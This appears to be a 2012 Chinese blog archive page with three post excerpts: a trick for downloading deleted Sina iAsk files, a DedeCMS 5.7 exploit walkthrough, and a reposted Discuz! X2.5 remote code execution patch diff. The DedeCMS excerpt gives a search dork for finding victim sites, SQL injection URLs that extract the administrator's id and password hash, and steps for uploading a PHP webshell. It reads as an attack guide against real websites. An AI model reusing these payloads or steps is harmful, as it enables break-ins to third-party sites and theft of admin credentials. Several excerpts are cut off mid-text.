博文

目前显示的是 四月, 2012的博文

AD

新浪爱问免积分/已删除屏蔽资源下载

图片
不多说,上图,
进入页面提示已经被删除


然后你懂的,旁边有个手机下载


dedecms5.7最新注入和上传漏洞

图片
漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。注入漏洞:       首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。  然后利用语句/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码  得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5第二部分:上传漏洞:要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,然后登陆会员中心,然后访问页面链接:  “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”如果出现“DeDeCMS提示信息:你没有选择上传的图片或选择的文件大小超出限制”说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm<form action="=../dialog/select_soft_post]
<[/url">http://hi.baidu.comt/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/sele…

Discuz! X2.5远程代码执行[转]

diff一下看 

 if(!defined('IN_DISCUZ')) {
@@ -89,7 +89,7 @@
}
}
if($searcharray && $replacearray) {
- $content = preg_replace("/(<as+.*?>.*?</a>)|(<imgs+.*?[/]?>)|([attach](d+)[/attach])/ies", 'helper_seo::base64_transform("encode", "<relatedlink>", "123", "</relatedlink>")', $content);
+ $content = preg_replace("/(<as+.*?>.*?</a>)|(<imgs+.*?[/]?>)|([attach](d+)[/attach])/ies", "helper_seo::base64_transform('encode', '<relatedlink>', '123', '</relatedlink>')", $content);
$content = preg_replace($searcharray, $replacearray, $content, 1);
$content = preg_replace("/<relatedlink>(.*?)</relatedlink>/ies", "helper_seo::base64_transform('decode', '', '1', '')", $content);
}
@@ -100,7 +100,7 @@ www.2cto.com

public static function base64_transform($ty…